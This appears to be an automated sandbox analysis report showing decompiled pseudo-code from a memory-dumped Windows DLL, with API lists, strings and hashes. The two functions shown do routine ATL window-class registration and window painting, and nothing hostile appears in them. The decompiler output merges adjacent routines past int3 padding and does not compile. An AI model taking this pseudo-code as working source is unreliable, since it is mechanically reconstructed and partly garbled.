Download Yara Rule

C-Code - Quality: 65%

			E6E7E2AE0(void* __ebx, signed int __ecx, WNDCLASSEXW* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				struct _WNDCLASSEXW _v64;
				struct _WNDCLASSEXW _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				intOrPtr* _v128;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed int* _v164;
				intOrPtr _v168;
				intOrPtr _v188;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t145;
				WCHAR* _t152;
				struct HINSTANCE__* _t153;
				struct HICON__* _t154;
				struct HINSTANCE__* _t156;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				intOrPtr _t166;
				intOrPtr _t176;
				void* _t177;
				intOrPtr _t178;
				intOrPtr _t183;
				void* _t188;
				signed int _t189;
				short* _t191;
				signed int _t200;
				signed int _t201;
				signed int _t208;
				signed int _t214;
				signed int _t215;
				void* _t216;
				signed int _t218;
				void* _t227;
				signed int* _t230;
				signed int _t232;
				intOrPtr* _t234;
				signed int _t240;
				signed int _t241;
				signed int _t245;
				signed int _t246;
				void* _t247;
				unsigned int _t254;
				signed int _t256;
				signed int _t258;
				signed int _t268;
				signed int _t269;
				unsigned int _t275;
				intOrPtr _t276;
				void* _t277;
				signed int _t281;
				signed int _t288;
				WCHAR* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				unsigned int _t295;
				intOrPtr _t297;
				WNDCLASSEXW* _t302;
				signed int _t305;
				signed int _t309;
				intOrPtr _t310;
				signed int _t311;
				signed int _t316;
				void* _t319;
				void* _t320;
				void* _t325;
				signed int _t328;
				void* _t329;
				void* _t335;
				void* _t346;

				_t346 = __fp0;
				_t227 = _t325;
				_t328 = (_t325 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t227 + 4));
				_t316 = _t328;
				_t329 = _t328 - 0x78;
				_t145 =  *0x6e81e008; // 0x77dcee0d
				_v16 = _t145 ^ _t316;
				_t302 = __edx;
				_t288 = __ecx;
				_t234 =  *((intOrPtr*)(_t227 + 8));
				_v116 = __ecx;
				_v128 = _t234;
				if(__edx == 0 || _t234 == 0) {
					L8:
					return E6E7E440A(_v16 ^ _t316);
				} else {
					if( *((short*)(__edx + 0x40)) != 0) {
						L33:
						__eflags =  *(_t302 + 0x30);
						if( *(_t302 + 0x30) != 0) {
							_t53 = _t302 + 0x34; // 0x0
							 *_t234 =  *_t53;
						}
						__eflags = _v16 ^ _t316;
						return E6E7E440A(_v16 ^ _t316);
					} else {
						EnterCriticalSection(0x6e81eaa4);
						if( *(_t302 + 0x40) != 0) {
							L32:
							LeaveCriticalSection(0x6e81eaa4);
							_t234 = _v128;
							goto L33;
						} else {
							_t9 = _t302 + 0x30; // 0x0
							_t152 =  *_t9;
							if(_t152 == 0) {
								__eflags =  *(_t302 + 0x3c);
								if( *(_t302 + 0x3c) == 0) {
									_t26 = _t288 + 8; // 0x6e7d0000
									_t153 =  *_t26;
								} else {
									_t153 = 0;
								}
								_t27 = _t302 + 0x38; // 0x7f00
								_t154 = LoadCursorW(_t153,  *_t27);
								_t28 =  &(_t302->lpszClassName); // 0x0
								_t291 =  *_t28;
								_t302->hCursor = _t154;
								goto L14;
							} else {
								_t10 = _t302 + 8; // 0x6e7e28f0
								_t11 =  &(_t302->lpszClassName); // 0x0
								_t291 =  *_t11;
								_v120 =  *_t10;
								_v64.cbSize = 0x30;
								if(GetClassInfoExW(0, _t152,  &_v64) != 0) {
									L9:
									asm("movups xmm0, [ebp-0x34]");
									asm("movups [esi], xmm0");
									asm("movups xmm0, [ebp-0x24]");
									asm("movups [esi+0x10], xmm0");
									asm("movups xmm0, [ebp-0x14]");
									asm("movups [esi+0x20], xmm0");
									_t20 = _t302 + 8; // 0x6e7e28f0
									 *((intOrPtr*)(_t302 + 0x34)) =  *_t20;
									_t302->lpszClassName = _t291;
									 *((intOrPtr*)(_t302 + 8)) = _v120;
									L14:
									_t156 =  *(_v116 + 4);
									_t302->style = _t302->style & 0xffffbfff;
									_t302->hInstance = _t156;
									__eflags = _t291;
									if(_t291 == 0) {
										_t35 = _t302 + 0x42; // 0x6e81ea02
										_t291 = _t35;
										E6E7DD7C0(_t291, 0x25, L"ATL:%p", _t302);
										_t36 =  &(_t302->hInstance); // 0x0
										_t156 =  *_t36;
										_t329 = _t329 + 0x10;
										_t302->lpszClassName = _t291;
									}
									asm("movups xmm0, [esi]");
									asm("movups [ebp-0x64], xmm0");
									asm("movups xmm0, [esi+0x10]");
									asm("movups [ebp-0x54], xmm0");
									asm("movups xmm0, [esi+0x20]");
									asm("movups [ebp-0x44], xmm0");
									_t158 = GetClassInfoExW(_t156, _t291,  &_v112) & 0x0000ffff;
									 *(_t302 + 0x40) = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										goto L32;
									} else {
										_t268 = RegisterClassExW(_t302) & 0x0000ffff;
										_v116 = _t268;
										__eflags = _t268;
										if(_t268 == 0) {
											L31:
											 *(_t302 + 0x40) = _v116;
											goto L32;
										} else {
											_t240 =  *0x6e81eac4; // 0x0
											_t292 =  *0x6e81eac8; // 0x0
											__eflags = _t240 - _t292;
											if(_t240 != _t292) {
												_t161 =  *0x6e81eac0; // 0x0
												goto L28;
											} else {
												_t269 =  *0x6e81eac0; // 0x0
												__eflags =  &_v124 - _t269;
												if( &_v124 < _t269) {
													L21:
													__eflags = _t292;
													if(_t292 != 0) {
														_t293 = _t240 + _t240;
														__eflags = _t293;
														if(_t293 >= 0) {
															__eflags = _t293 - 0x3fffffff;
															if(_t293 <= 0x3fffffff) {
																goto L25;
															}
														}
													} else {
														_t293 = 1;
														L25:
														_push(2);
														_push(_t293);
														_t161 = E6E7F5BE4(_t269);
														__eflags = _t161;
														if(_t161 != 0) {
															_t240 =  *0x6e81eac4; // 0x0
															_t268 = _v116;
															 *0x6e81eac8 = _t293;
															 *0x6e81eac0 = _t161;
															L28:
															_t162 = _t161 + _t240 * 2;
															__eflags = _t162;
															if(_t162 != 0) {
																 *_t162 = _t268;
																_t240 =  *0x6e81eac4; // 0x0
															}
															_t241 = _t240 + 1;
															__eflags = _t241;
															 *0x6e81eac4 = _t241;
														}
													}
													goto L31;
												} else {
													__eflags =  &_v124 - _t269 + _t292 * 2;
													_t240 =  *0x6e81eac4; // 0x0
													if( &_v124 < _t269 + _t292 * 2) {
														E6E7D81D0(0x80004005);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t316);
														_t319 = _t329;
														_t335 = _t329 - 0x18;
														_t166 = _v140;
														_v156 = _t166;
														_push(_t227);
														_t230 = _t240;
														_push(_t302);
														_push(_t292);
														_v160 = _v136;
														_t294 =  *_t230;
														_t245 = _t230[1] - _t294;
														_v164 = _t230;
														_v152 = (0x2aaaaaab * (_t166 - _t294) >> 0x20 >> 3 >> 0x1f) + (0x2aaaaaab * (_t166 - _t294) >> 0x20 >> 3);
														_t275 = 0x2aaaaaab * _t245 >> 0x20 >> 3;
														_t176 = (_t275 >> 0x1f) + _t275;
														_v168 = _t176;
														__eflags = _t176 - 0x5555555;
														if(__eflags == 0) {
															L62:
															_t177 = E6E7D5150(_t245, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t319);
															_t320 = _t335;
															_push(_t302);
															_push(_t294);
															_t295 = _t275;
															_t305 = _t245;
															__eflags = _t305 - _t295;
															if(_t305 == _t295) {
																L71:
																return _t177;
															} else {
																do {
																	_t246 =  *(_t305 + 0x14);
																	__eflags = _t246 - 8;
																	if(_t246 < 8) {
																		goto L70;
																	} else {
																		_t178 =  *_t305;
																		_t247 = 2 + _t246 * 2;
																		__eflags = _t247 - 0x1000;
																		if(_t247 < 0x1000) {
																			L69:
																			_push(_t247);
																			E6E7E441B(_t178);
																			_t335 = _t335 + 8;
																			goto L70;
																		} else {
																			_t276 =  *((intOrPtr*)(_t178 - 4));
																			_t247 = _t247 + 0x23;
																			__eflags = _t178 - _t276 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				E6E7EE5E6(_t230, _t247, _t276, _t295, __eflags);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t320);
																				_t183 = _v188;
																				_push(_t305);
																				_push(_t295);
																				_t297 = _t276;
																				__eflags = _t247 - _t297;
																				if(_t247 != _t297) {
																					_t277 = _t247 + 0x2c;
																					_t309 = _t183 - _t247;
																					__eflags = _t309;
																					do {
																						 *(_t183 + 0x10) = 0;
																						_t277 = _t277 + 0x30;
																						 *(_t183 + 0x14) = 0;
																						asm("movups xmm0, [edx-0x5c]");
																						asm("movups [eax], xmm0");
																						asm("movq xmm0, [edx-0x4c]");
																						asm("movq [eax+0x10], xmm0");
																						 *(_t277 - 0x4c) = 0;
																						 *(_t277 - 0x48) = 7;
																						 *((short*)(_t277 - 0x5c)) = 0;
																						 *((intOrPtr*)(_t183 + 0x28)) = 0;
																						 *((intOrPtr*)(_t277 - 0x30 + _t309)) = 0;
																						asm("movups xmm0, [edx-0x44]");
																						asm("movups [eax+0x18], xmm0");
																						asm("movq xmm0, [edx-0x34]");
																						asm("movq [eax+0x28], xmm0");
																						_t183 = _t183 + 0x30;
																						 *((intOrPtr*)(_t277 - 0x34)) = 0;
																						 *(_t277 - 0x30) = 7;
																						 *((short*)(_t277 - 0x44)) = 0;
																						__eflags = _t277 - 0x2c - _t297;
																					} while (_t277 - 0x2c != _t297);
																				}
																				return _t183;
																			} else {
																				_t178 = _t276;
																				goto L69;
																			}
																		}
																	}
																	goto L77;
																	L70:
																	_t177 = 0;
																	 *(_t305 + 0x10) = 0;
																	 *(_t305 + 0x14) = 7;
																	 *_t305 = 0;
																	_t305 = _t305 + 0x1c;
																	__eflags = _t305 - _t295;
																} while (_t305 != _t295);
																goto L71;
															}
														} else {
															_t302 = _t176 + 1;
															_t254 = (0x2aaaaaab * (_t230[2] - _t294) >> 0x20 >> 3 >> 0x1f) + (0x2aaaaaab * (_t230[2] - _t294) >> 0x20 >> 3);
															_t281 = _t254 >> 1;
															__eflags = _t254 - 0x5555555 - _t281;
															if(_t254 <= 0x5555555 - _t281) {
																_t188 = _t281 + _t254;
																__eflags = _t188 - _t302;
																_t189 =  <  ? _t302 : _t188;
															} else {
																_t189 = _t302;
															}
															_t256 = _t189 + _t189 * 2 << 4;
															_v64.hIcon = _t256;
															__eflags = _t189 - 0x5555555;
															if(_t189 <= 0x5555555) {
																__eflags = _t256 - 0x1000;
																if(_t256 < 0x1000) {
																	__eflags = _t256;
																	if(__eflags == 0) {
																		_t294 = 0;
																		__eflags = 0;
																	} else {
																		_push(_t256);
																		_t215 = E6E7E4429(_t281, _t302, __eflags);
																		_t335 = _t335 + 4;
																		_t294 = _t215;
																	}
																	goto L49;
																} else {
																	goto L44;
																}
															} else {
																_t256 = _t256 | 0xffffffff;
																L44:
																_t216 = _t256 + 0x23;
																_t275 = _t281 | 0xffffffff;
																__eflags = _t216 - _t256;
																_t217 =  <=  ? _t275 : _t216;
																_push( <=  ? _t275 : _t216);
																_t218 = E6E7E4429(_t275, _t302, _t216 - _t256);
																_t335 = _t335 + 4;
																__eflags = _t218;
																if(__eflags == 0) {
																	L61:
																	E6E7EE5E6(_t230, _t245, _t275, _t294, __eflags);
																	goto L62;
																} else {
																	_t83 = _t218 + 0x23; // 0x23
																	_t294 = _t83 & 0xffffffe0;
																	 *(_t294 - 4) = _t218;
																	L49:
																	_t310 = _v64.lpszClassName;
																	_t191 = _v64.lpszMenuName;
																	_t258 = _v64.hIconSm + _v64.hIconSm * 2 << 4;
																	_v64.hIconSm = _t258;
																	 *(_t258 + _t294 + 0x10) = 0;
																	 *(_t258 + _t294 + 0x14) = 0;
																	asm("movups xmm0, [eax]");
																	asm("movups [ecx+edi], xmm0");
																	asm("movq xmm0, [eax+0x10]");
																	asm("movq [ecx+edi+0x10], xmm0");
																	 *(_t191 + 0x10) = 0;
																	 *(_t191 + 0x14) = 7;
																	 *_t191 = 0;
																	 *((intOrPtr*)(_t258 + _t294 + 0x28)) = 0;
																	 *((intOrPtr*)(_t258 + _t294 + 0x2c)) = 0;
																	asm("movups xmm0, [eax+0x18]");
																	asm("movups [ecx+edi+0x18], xmm0");
																	asm("movq xmm0, [eax+0x28]");
																	asm("movq [ecx+edi+0x28], xmm0");
																	 *((intOrPtr*)(_t191 + 0x28)) = 0;
																	 *(_t191 + 0x2c) = 7;
																	 *((short*)(_t191 + 0x18)) = 0;
																	_push( *_t230);
																	_push(_t294);
																	__eflags = _t310 - _t230[1];
																	if(_t310 != _t230[1]) {
																		L73();
																		_t335 = _t335 + 4;
																		_t214 = _v64.hIconSm + 0x30 + _t294;
																		__eflags = _t214;
																		_push(_t214);
																	}
																	L73();
																	_t311 =  *_t230;
																	_t335 = _t335 + 8;
																	__eflags = _t311;
																	if(_t311 == 0) {
																		L60:
																		 *_t230 = _t294;
																		_t230[1] = (_v64.hCursor + _v64.hCursor * 2 + 3 << 4) + _t294;
																		_t230[2] = _v64.hIcon + _t294;
																		_t200 =  *_t230 + _v64.hIconSm;
																		__eflags = _t200;
																		return _t200;
																	} else {
																		_t201 = _t230[1];
																		__eflags = _t311 - _t201;
																		if(_t311 != _t201) {
																			_t232 = _t201;
																			do {
																				E6E7D8EE0(_t232, _t311, _t294, _t311, _t346);
																				_t311 = _t311 + 0x30;
																				__eflags = _t311 - _t232;
																			} while (_t311 != _t232);
																			_t230 = _v64.hbrBackground;
																			_t311 =  *_t230;
																		}
																		_t275 = 0x2aaaaaab * (_t230[2] - _t311) >> 0x20 >> 3;
																		_t208 = (_t275 >> 0x1f) + _t275 + ((_t275 >> 0x1f) + _t275) * 2 << 4;
																		__eflags = _t208 - 0x1000;
																		if(_t208 < 0x1000) {
																			L59:
																			_push(_t208);
																			E6E7E441B(_t311);
																			goto L60;
																		} else {
																			_t245 =  *(_t311 - 4);
																			_t208 = _t208 + 0x23;
																			_t302 = _t311 - _t245 + 0xfffffffc;
																			__eflags = _t302 - 0x1f;
																			if(__eflags > 0) {
																				goto L61;
																			} else {
																				_t311 = _t245;
																				goto L59;
																			}
																		}
																	}
																}
															}
														}
													} else {
														goto L21;
													}
												}
											}
										}
									}
								} else {
									_t17 = _t302 + 0x30; // 0x0
									if(GetClassInfoExW( *(_v116 + 4),  *_t17,  &_v64) != 0) {
										goto L9;
									} else {
										LeaveCriticalSection(0x6e81eaa4);
										goto L8;
									}
								}
							}
						}
					}
				}
				L77:
			}

0x6e7e2ae0
0x6e7e2ae1
0x6e7e2ae9
0x6e7e2af0
0x6e7e2af4
0x6e7e2af6
0x6e7e2af9
0x6e7e2b00
0x6e7e2b05
0x6e7e2b07
0x6e7e2b09
0x6e7e2b0c
0x6e7e2b0f
0x6e7e2b14
0x6e7e2b89
0x6e7e2b9d
0x6e7e2b1a
0x6e7e2b1f
0x6e7e2cfc
0x6e7e2cfc
0x6e7e2d00
0x6e7e2d02
0x6e7e2d05
0x6e7e2d05
0x6e7e2d0e
0x6e7e2d1d
0x6e7e2b25
0x6e7e2b2a
0x6e7e2b35
0x6e7e2cee
0x6e7e2cf3
0x6e7e2cf9
0x00000000
0x6e7e2b3b
0x6e7e2b3b
0x6e7e2b3b
0x6e7e2b40
0x6e7e2bc6
0x6e7e2bca
0x6e7e2bd0
0x6e7e2bd0
0x6e7e2bcc
0x6e7e2bcc
0x6e7e2bcc
0x6e7e2bd3
0x6e7e2bd7
0x6e7e2bdd
0x6e7e2bdd
0x6e7e2be0
0x00000000
0x6e7e2b46
0x6e7e2b46
0x6e7e2b49
0x6e7e2b49
0x6e7e2b4c
0x6e7e2b56
0x6e7e2b65
0x6e7e2b9e
0x6e7e2b9e
0x6e7e2ba2
0x6e7e2ba5
0x6e7e2ba9
0x6e7e2bad
0x6e7e2bb1
0x6e7e2bb5
0x6e7e2bb8
0x6e7e2bbe
0x6e7e2bc1
0x6e7e2be3
0x6e7e2be6
0x6e7e2be9
0x6e7e2bf0
0x6e7e2bf3
0x6e7e2bf5
0x6e7e2bfd
0x6e7e2bfd
0x6e7e2c03
0x6e7e2c08
0x6e7e2c08
0x6e7e2c0b
0x6e7e2c0e
0x6e7e2c0e
0x6e7e2c11
0x6e7e2c18
0x6e7e2c1d
0x6e7e2c22
0x6e7e2c26
0x6e7e2c2a
0x6e7e2c34
0x6e7e2c37
0x6e7e2c3b
0x6e7e2c3e
0x00000000
0x6e7e2c44
0x6e7e2c4b
0x6e7e2c4e
0x6e7e2c51
0x6e7e2c54
0x6e7e2ce7
0x6e7e2cea
0x00000000
0x6e7e2c5a
0x6e7e2c5a
0x6e7e2c60
0x6e7e2c66
0x6e7e2c68
0x6e7e2ccb
0x00000000
0x6e7e2c6a
0x6e7e2c6a
0x6e7e2c73
0x6e7e2c75
0x6e7e2c8b
0x6e7e2c8b
0x6e7e2c8d
0x6e7e2c96
0x6e7e2c99
0x6e7e2c9b
0x6e7e2c9d
0x6e7e2ca3
0x00000000
0x00000000
0x6e7e2ca3
0x6e7e2c8f
0x6e7e2c8f
0x6e7e2ca5
0x6e7e2ca5
0x6e7e2ca7
0x6e7e2ca9
0x6e7e2cb1
0x6e7e2cb3
0x6e7e2cb5
0x6e7e2cbb
0x6e7e2cbe
0x6e7e2cc4
0x6e7e2cd0
0x6e7e2cd0
0x6e7e2cd3
0x6e7e2cd5
0x6e7e2cd7
0x6e7e2cda
0x6e7e2cda
0x6e7e2ce0
0x6e7e2ce0
0x6e7e2ce1
0x6e7e2ce1
0x6e7e2cb3
0x00000000
0x6e7e2c77
0x6e7e2c7d
0x6e7e2c7f
0x6e7e2c85
0x6e7e2d23
0x6e7e2d28
0x6e7e2d29
0x6e7e2d2a
0x6e7e2d2b
0x6e7e2d2c
0x6e7e2d2d
0x6e7e2d2e
0x6e7e2d2f
0x6e7e2d30
0x6e7e2d31
0x6e7e2d33
0x6e7e2d36
0x6e7e2d3b
0x6e7e2d43
0x6e7e2d44
0x6e7e2d49
0x6e7e2d4a
0x6e7e2d4b
0x6e7e2d4e
0x6e7e2d57
0x6e7e2d59
0x6e7e2d66
0x6e7e2d70
0x6e7e2d78
0x6e7e2d7a
0x6e7e2d7d
0x6e7e2d82
0x6e7e2f40
0x6e7e2f40
0x6e7e2f45
0x6e7e2f46
0x6e7e2f47
0x6e7e2f48
0x6e7e2f49
0x6e7e2f4a
0x6e7e2f4b
0x6e7e2f4c
0x6e7e2f4d
0x6e7e2f4e
0x6e7e2f4f
0x6e7e2f50
0x6e7e2f51
0x6e7e2f53
0x6e7e2f54
0x6e7e2f55
0x6e7e2f57
0x6e7e2f59
0x6e7e2f5b
0x6e7e2faf
0x6e7e2fb2
0x6e7e2f60
0x6e7e2f60
0x6e7e2f60
0x6e7e2f63
0x6e7e2f66
0x00000000
0x6e7e2f68
0x6e7e2f68
0x6e7e2f6a
0x6e7e2f71
0x6e7e2f77
0x6e7e2f8b
0x6e7e2f8b
0x6e7e2f8d
0x6e7e2f92
0x00000000
0x6e7e2f79
0x6e7e2f79
0x6e7e2f7c
0x6e7e2f84
0x6e7e2f87
0x6e7e2fb3
0x6e7e2fb8
0x6e7e2fb9
0x6e7e2fba
0x6e7e2fbb
0x6e7e2fbc
0x6e7e2fbd
0x6e7e2fbe
0x6e7e2fbf
0x6e7e2fc0
0x6e7e2fc3
0x6e7e2fc6
0x6e7e2fc7
0x6e7e2fc8
0x6e7e2fca
0x6e7e2fcc
0x6e7e2fd0
0x6e7e2fd3
0x6e7e2fd3
0x6e7e2fd5
0x6e7e2fd5
0x6e7e2fdc
0x6e7e2fdf
0x6e7e2fe8
0x6e7e2fec
0x6e7e2fef
0x6e7e2ff4
0x6e7e2ff9
0x6e7e3000
0x6e7e3007
0x6e7e300b
0x6e7e300e
0x6e7e3012
0x6e7e3016
0x6e7e301a
0x6e7e301f
0x6e7e3024
0x6e7e3027
0x6e7e302a
0x6e7e3031
0x6e7e3038
0x6e7e3038
0x6e7e2fd5
0x6e7e303f
0x6e7e2f89
0x6e7e2f89
0x00000000
0x6e7e2f89
0x6e7e2f87
0x6e7e2f77
0x00000000
0x6e7e2f95
0x6e7e2f95
0x6e7e2f97
0x6e7e2f9e
0x6e7e2fa5
0x6e7e2fa8
0x6e7e2fab
0x6e7e2fab
0x00000000
0x6e7e2f60
0x6e7e2d88
0x6e7e2d8b
0x6e7e2da4
0x6e7e2da8
0x6e7e2dac
0x6e7e2dae
0x6e7e2db4
0x6e7e2db7
0x6e7e2db9
0x6e7e2db0
0x6e7e2db0
0x6e7e2db0
0x6e7e2dbf
0x6e7e2dc2
0x6e7e2dc5
0x6e7e2dca
0x6e7e2dd1
0x6e7e2dd7
0x6e7e2e00
0x6e7e2e02
0x6e7e2e11
0x6e7e2e11
0x6e7e2e04
0x6e7e2e04
0x6e7e2e05
0x6e7e2e0a
0x6e7e2e0d
0x6e7e2e0d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7e2dcc
0x6e7e2dcc
0x6e7e2dd9
0x6e7e2dd9
0x6e7e2ddc
0x6e7e2ddf
0x6e7e2de1
0x6e7e2de4
0x6e7e2de5
0x6e7e2dea
0x6e7e2ded
0x6e7e2def
0x6e7e2f3b
0x6e7e2f3b
0x00000000
0x6e7e2df5
0x6e7e2df5
0x6e7e2df8
0x6e7e2dfb
0x6e7e2e13
0x6e7e2e18
0x6e7e2e1e
0x6e7e2e21
0x6e7e2e24
0x6e7e2e27
0x6e7e2e2f
0x6e7e2e37
0x6e7e2e3a
0x6e7e2e3e
0x6e7e2e43
0x6e7e2e49
0x6e7e2e50
0x6e7e2e57
0x6e7e2e5a
0x6e7e2e5e
0x6e7e2e62
0x6e7e2e66
0x6e7e2e6b
0x6e7e2e70
0x6e7e2e78
0x6e7e2e7b
0x6e7e2e82
0x6e7e2e8b
0x6e7e2e8c
0x6e7e2e8d
0x6e7e2e8f
0x6e7e2e93
0x6e7e2e9b
0x6e7e2ea4
0x6e7e2ea4
0x6e7e2ea8
0x6e7e2ea8
0x6e7e2ea9
0x6e7e2eae
0x6e7e2eb0
0x6e7e2eb3
0x6e7e2eb5
0x6e7e2f12
0x6e7e2f15
0x6e7e2f22
0x6e7e2f2a
0x6e7e2f2f
0x6e7e2f2f
0x6e7e2f38
0x6e7e2eb7
0x6e7e2eb7
0x6e7e2eba
0x6e7e2ebc
0x6e7e2ebe
0x6e7e2ec0
0x6e7e2ec2
0x6e7e2ec7
0x6e7e2eca
0x6e7e2eca
0x6e7e2ece
0x6e7e2ed1
0x6e7e2ed1
0x6e7e2edf
0x6e7e2eec
0x6e7e2eef
0x6e7e2ef4
0x6e7e2f08
0x6e7e2f08
0x6e7e2f0a
0x00000000
0x6e7e2ef6
0x6e7e2ef6
0x6e7e2ef9
0x6e7e2efe
0x6e7e2f01
0x6e7e2f04
0x00000000
0x6e7e2f06
0x6e7e2f06
0x00000000
0x6e7e2f06
0x6e7e2f04
0x6e7e2ef4
0x6e7e2eb5
0x6e7e2def
0x6e7e2dca
0x00000000
0x00000000
0x00000000
0x6e7e2c85
0x6e7e2c75
0x6e7e2c68
0x6e7e2c54
0x6e7e2b67
0x6e7e2b6e
0x6e7e2b7c
0x00000000
0x6e7e2b7e
0x6e7e2b83
0x00000000
0x6e7e2b83
0x6e7e2b7c
0x6e7e2b65
0x6e7e2b40
0x6e7e2b35
0x6e7e2b1f
0x00000000

APIs

EnterCriticalSection.KERNEL32(6E81EAA4,?,?), ref: 6E7E2B2A
GetClassInfoExW.USER32 ref: 6E7E2B5D
GetClassInfoExW.USER32 ref: 6E7E2B74
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2B83
LoadCursorW.USER32(6E7D0000,00007F00), ref: 6E7E2BD7
GetClassInfoExW.USER32 ref: 6E7E2C2E
RegisterClassExW.USER32 ref: 6E7E2C45
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2CF3

Strings

ATL:%p, xrefs: 6E7E2BF8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: 018c944419b3e50cf8ff07c5bae6a57bd24f73556b346d53dc8f7ccf454a13c2
Instruction ID: a51447af9ce52aa3163cba725d94dd1dd998752f85cfade62ba1bb3c6c407d1b
Opcode Fuzzy Hash: 018c944419b3e50cf8ff07c5bae6a57bd24f73556b346d53dc8f7ccf454a13c2
Instruction Fuzzy Hash: 9271A330904B469FDB20CFA8CA455AAB7F5FF59314F104A2DE84A97E60E730B984CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E0760, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6E7E0760(void* __ecx, intOrPtr _a8, _Unknown_base(*)()** _a20, intOrPtr _a24) {
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t36;
				intOrPtr _t49;
				void* _t57;
				struct HDC__* _t58;

				_t56 = __ecx;
				if(_a24 != 0) {
					L3:
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 1) {
						_t49 = __ecx - 0x14;
						if(_t25 != 2) {
							if(_t25 != 0xf) {
								if(_t25 == 0x113) {
									L15:
									InvalidateRect( *(_t56 + 4), 0, 1);
									 *_a20 = 0;
									return 1;
								} else {
									if(_t25 != 0x14) {
										if(_t25 != 0x201) {
											goto L3;
										} else {
											 *(__ecx + 0x78) = ( *(__ecx + 0x78) + 1) % ( *((intOrPtr*)(__ecx + 0x68)) -  *((intOrPtr*)(__ecx + 0x64)) >> 4);
											goto L15;
										}
									} else {
										 *_a20 = 1;
										return 1;
									}
								}
							} else {
								 *_a20 = E6E7E1A90(_t49, __ecx, _t57);
								return 1;
							}
						} else {
							_t36 =  *(__ecx + 0x40);
							if(_t36 != 0) {
								DeleteObject(_t36);
								 *(__ecx + 0x40) = 0;
							}
							 *_a20 = 0;
							return 0;
						}
					} else {
						_push(_t57);
						_t58 = GetDC( *(__ecx + 4));
						 *((intOrPtr*)(_t56 + 0x40)) = CreateFontW( ~(MulDiv(8, GetDeviceCaps(_t58, 0x5a), 0x48)), 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0, L"Arial");
						ReleaseDC( *(_t56 + 4), _t58);
						SetTimer( *(_t56 + 4), 0x3e8, 0x3e8, 0);
						 *_a20 = 0;
						goto L3;
					}
				}
			}

0x6e7e0768
0x6e7e076a
0x6e7e07e9
0x6e7e07ed
0x6e7e076c
0x6e7e076c
0x6e7e0772
0x6e7e07f0
0x6e7e07f6
0x6e7e0820
0x6e7e083e
0x6e7e0873
0x6e7e087a
0x6e7e0884
0x6e7e0890
0x6e7e0840
0x6e7e0843
0x6e7e085d
0x00000000
0x6e7e085f
0x6e7e0870
0x00000000
0x6e7e0870
0x6e7e0845
0x6e7e0849
0x6e7e0855
0x6e7e0855
0x6e7e0843
0x6e7e0822
0x6e7e082e
0x6e7e0836
0x6e7e0836
0x6e7e07f8
0x6e7e07f8
0x6e7e07fd
0x6e7e0800
0x6e7e0806
0x6e7e0806
0x6e7e0811
0x6e7e081a
0x6e7e081a
0x6e7e0774
0x6e7e0774
0x6e7e07a0
0x6e7e07be
0x6e7e07c4
0x6e7e07d9
0x6e7e07e3
0x00000000
0x6e7e07e3
0x6e7e0772

APIs

GetDC.USER32(?), ref: 6E7E0778
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E7E07A5
MulDiv.KERNEL32(00000008,00000000), ref: 6E7E07AE
CreateFontW.GDI32(00000000), ref: 6E7E07B7
ReleaseDC.USER32 ref: 6E7E07C4
SetTimer.USER32 ref: 6E7E07D9

Part of subcall function 6E7E1A90: BeginPaint.USER32(?,?), ref: 6E7E1AD3
Part of subcall function 6E7E1A90: GetParent.USER32(?), ref: 6E7E1ADC
Part of subcall function 6E7E1A90: GetClientRect.USER32 ref: 6E7E1AF2
Part of subcall function 6E7E1A90: CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
Part of subcall function 6E7E1A90: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
Part of subcall function 6E7E1A90: SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
Part of subcall function 6E7E1A90: SelectObject.GDI32(00000000,?), ref: 6E7E1B38
Part of subcall function 6E7E1A90: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
Part of subcall function 6E7E1A90: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
Part of subcall function 6E7E1A90: SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
Part of subcall function 6E7E1A90: SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
Part of subcall function 6E7E1A90: GetClientRect.USER32 ref: 6E7E1B86
Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1B94
Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1BA9
